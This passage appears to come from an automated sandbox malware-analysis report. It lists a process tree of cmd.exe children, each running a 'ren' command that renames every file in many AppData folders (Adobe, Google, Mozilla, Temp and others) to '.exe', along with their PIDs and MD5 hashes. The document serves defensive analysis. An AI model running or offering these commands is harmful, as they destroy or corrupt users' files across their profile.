          • cmd.exe (PID: 3716 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\Acrobat_23.006.20320\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5524 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\S\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7640 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Color\Profiles\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3032 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6656 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7872 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\CEF\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3616 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 980 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\ConnectedDevicesPlatform\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 3772 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\D3DSCache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6112 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8156 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7364 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 5588 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 4676 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 4500 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\PeerDistRepub\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 3936 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\PlaceholderTileLogoFolder\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 5676 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Publishers\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4028 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\SolidDocuments\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7524 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7444 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5160 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\VirtualStore\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 3596 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2276 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2252 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5412 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Color\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5436 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4484 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2792 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3836 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4820 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7360 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5268 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5292 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1360 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cookie\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 3220 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7760 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7732 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3652 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 616 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Network\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 3588 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5620 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\336a045b-df12-4067-9f71-93ee2edb038d\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1372 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6364 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5684 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6504 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7240 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7852 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7092 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\{291AA914-A987-4CE9-BD63-0C0A92D435E5}\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 5832 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\Acrobat_23.006.20320\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7456 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\S\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 356 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Color\Profiles\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7524 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 1216 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4592 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\CEF\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7296 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6496 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\ConnectedDevicesPlatform\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3440 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\D3DSCache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 1784 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 2944 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6064 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7952 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 3812 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4796 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\PeerDistRepub\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7292 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\PlaceholderTileLogoFolder\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 3996 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Publishers\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5336 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\SolidDocuments\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6756 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5852 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5988 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\VirtualStore\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5784 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7280 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
